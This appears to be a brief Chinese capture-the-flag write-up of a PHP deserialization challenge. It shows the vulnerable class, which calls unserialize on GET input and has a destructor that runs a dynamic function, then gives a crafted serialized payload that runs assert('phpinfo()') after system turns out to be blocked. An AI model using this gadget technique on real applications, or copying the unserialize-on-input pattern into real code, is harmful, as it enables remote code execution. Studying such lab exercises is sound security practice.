检查
拿到代码
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["data"]);
很明显是一道PHP反序列化题目
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
这一部分告诉了我们利用了PHP动态函数来执行函数的调用,这里我们用assert(phpinfo())
因为可以试试发现system
禁掉了
构造
<?php
#error_reporting(0);
class HelloPhp
{
public $a="phpinfo()";
public $b="assert";
}
$c = new HelloPhp;
echo serialize($c);
最终PL
?data=O:8:“HelloPhp”:2:{s:1:“a”;s:9:“phpinfo()”;s:1:“b”;s:6:“assert”;}
在里面翻找到flag